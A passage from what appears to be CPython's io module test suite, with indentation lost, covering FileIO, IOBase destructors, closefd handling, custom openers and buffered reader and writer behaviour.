with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so this
# is not so easy to check.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it would end up in gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
